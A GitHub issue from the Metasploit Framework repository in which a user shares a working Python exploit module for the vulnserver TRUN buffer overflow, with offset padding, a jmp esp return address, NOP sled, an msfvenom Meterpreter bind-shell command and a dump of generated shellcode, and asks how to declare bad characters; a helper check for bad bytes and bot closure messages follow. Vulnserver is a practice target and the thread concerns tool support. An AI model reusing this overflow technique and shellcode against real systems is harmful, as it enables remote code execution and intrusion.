rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

Specifying bad characters for payload in external Python module #18495

Closed: simonla82 closed this 10 months ago

simonla82 commented 1 year ago

Summary

I am trying to specify bad characters for the payload in an external Python module of type remote_exploit. However, I can't get it to work and, thus, the payload contains bad characters.

Relevant information

The exploit I am trying to build in a module is for the vulnserver application. Currently my code is:

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

# standard modules
import logging

# extra modules
dependencies_missing = False
try:
    import socket
    import base64
except ImportError:
    dependencies_missing = True

from metasploit import module

metadata = {
    'name': 'Vulnserver Exploit',
    'description': '''
        Some useless description
    ''',
    'authors': [
        'some name'
    ],
    'date': '2023-10-27',
    'license': 'MSF_LICENSE',
    'references': [],
    'type': 'remote_exploit',
    'targets': [
      {'platform':'win', 'arch': 'x86'}
    ],
    'payload': {
        'bad_chars': '\\x00'
    },
    'options': {
        'rhost': {'type': 'address', 'description': 'Target address', 'required': True, 'default': None},
        'rport': {'type': 'port', 'description': 'Target port', 'required': True, 'default': 9999}
    }
}

def run(args):
    module.LogHandler.setup(msg_prefix='{} - '.format(args['rhost']))

    if dependencies_missing:
        logging.error('Module dependency (socket/base64) is missing, cannot continue')
        return

    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # settimeout() applies to this socket; assigning socket.timeout = 1
        # would instead overwrite the socket.timeout exception class
        s.settimeout(1)
        s.connect((args['rhost'], int(args['rport'])))
        s.recv(1024)  # consume the vulnserver banner

        # the framework hands the generated payload over base64-encoded
        shellcode = base64.b64decode(args['payload_encoded'])
        padding = 2007 * b'a'
        ret_address = b'\xf0\x12\x50\x62' # address of jmp esp gadget
        nop_sled = b'\x90' * 32

        logging.info(ret_address + nop_sled + shellcode)

        s.sendall(b"TRUN ." + padding + ret_address + nop_sled + shellcode)
        s.close()
    except Exception as e:
        logging.error('{}'.format(e))
        return

if __name__ == '__main__':
    module.run(metadata, run)

And in principle, the exploit is working. If I replace shellcode with the output of msfvenom -p windows/meterpreter/bind_tcp --format py --bad-chars '\x00', I can successfully spawn a Meterpreter session. However, I would like the shellcode to be generated dynamically according to the configured payload and not hard-code it. If I do that, i.e., execute the code as is, payload_encoded gives a payload that contains \x00 bytes, as the output of logging.info(ret_address + nop_sled + shellcode) shows:

[*] 10.11.11.200 - b'\xf0\x12Pb\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xfc\xe8\x8f\x00\x00\x00`\x89\xe51\xd2d\x8bR0\x8bR\x0c\x8bR\x14\x0f\xb7J&1\xff\x8br(1\xc0\xac<a|\x02, \xc1\xcf\r\x01\xc7Iu\xefR\x8bR\x10W\x8bB<\x01\xd0\x8b@x\x85\xc0tL\x01\xd0P\x8bH\x18\x8bX \x01\xd3\x85\xc9t<1\xffI\x8b4\x8b\x01\xd61\xc0\xc1\xcf\r\xac\x01\xc78\xe0u\xf4\x03}\xf8;}$u\xe0X\x8bX$\x01\xd3f\x8b\x0cK\x8bX\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89D$$[[aYZQ\xff\xe0X_Z\x8b\x12\xe9\x80\xff\xff\xff]h32\x00\x00hws2_ThLw&\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00)\xc4TPh)\x80k\x00\xff\xd5j\nh\n\x0b\x0b\x0bh\x02\x00\x11\\\x89\xe6PPPP@P@Ph\xea\x0f\xdf\xe0\xff\xd5\x97j\x10VWh\x99\xa5ta\xff\xd5\x85\xc0t\x0c\xffN\x08u\xech\xf0\xb5\xa2V\xff\xd5j\x00j\x04VWh\x02\xd9\xc8_\xff\xd5\x8b6j@h\x00\x10\x00\x00Vj\x00hX\xa4S\xe5\xff\xd5\x93Sj\x00VSWh\x02\xd9\xc8_\xff\xd5\x01\xc3)\xc6u\xee\xc3'

So, how can I specify bad characters in an external Python module?

Any help is highly appreciated!
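An added check, not code from the issue or from Metasploit: it decodes a payload the way `run()` receives it in `args['payload_encoded']` and reports every byte that appears in a bad-character spec, so a module can refuse to send a payload that the framework generated with forbidden bytes. It also shows that the Python literal `'\\x00'` used in the metadata above is four characters (backslash, x, 0, 0) rather than a NUL byte; whether the framework's shim decodes that spec is not something this thread establishes, so `parse_bad_chars` is an assumption about how such a spec could be turned into bytes.

```python
# Added example (not from the issue or Metasploit): verify a decoded payload
# against a bad-character list before it is sent.
import base64
import codecs


def parse_bad_chars(spec: str) -> bytes:
    """Turn an escaped spec such as '\\x00\\x0a' into the raw bytes it names.

    In Python source, '\\x00' is the four characters backslash, 'x', '0', '0',
    not a NUL byte, so the escapes have to be decoded first. (Assumption: this
    is how one would interpret the spec; the framework may treat it differently.)
    """
    return codecs.decode(spec, "unicode_escape").encode("latin-1")


def find_bad_chars(payload: bytes, bad: bytes) -> list:
    """Return (offset, byte_value) for every byte of payload that is in bad."""
    return [(i, b) for i, b in enumerate(payload) if b in bad]


def check_payload(payload_encoded: str, bad_spec: str) -> list:
    """Decode a base64 payload (as args['payload_encoded'] delivers it) and
    list the forbidden bytes it contains; an empty list means it is clean."""
    shellcode = base64.b64decode(payload_encoded)
    return find_bad_chars(shellcode, parse_bad_chars(bad_spec))


# Constructed samples, base64-encoded the way the framework hands the payload
# to run(): one fragment containing three NUL bytes, one containing none.
DIRTY_PAYLOAD = base64.b64encode(b"\xfc\xe8\x8f\x00\x00\x00\x60\x89").decode()
CLEAN_PAYLOAD = base64.b64encode(b"\x90\x90\xcc").decode()

if __name__ == "__main__":
    hits = check_payload(DIRTY_PAYLOAD, "\\x00")
    print("forbidden bytes at:", [(off, hex(b)) for off, b in hits])
    print("clean payload hits:", check_payload(CLEAN_PAYLOAD, "\\x00"))
```

A module can call `check_payload` on `args['payload_encoded']` before building the buffer and log an error instead of sending when the list is non-empty.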

adfoster-r7 commented 1 year ago

I'm not sure if this functionality already exists in the Python support or not; but it would be very easy to migrate this to be written using Ruby if any help is needed :+1:

github-actions[bot] commented 11 months ago

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

github-actions[bot] commented 10 months ago

Hi again!

It’s been 60 days since anything happened on this issue, so we are going to close it. Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.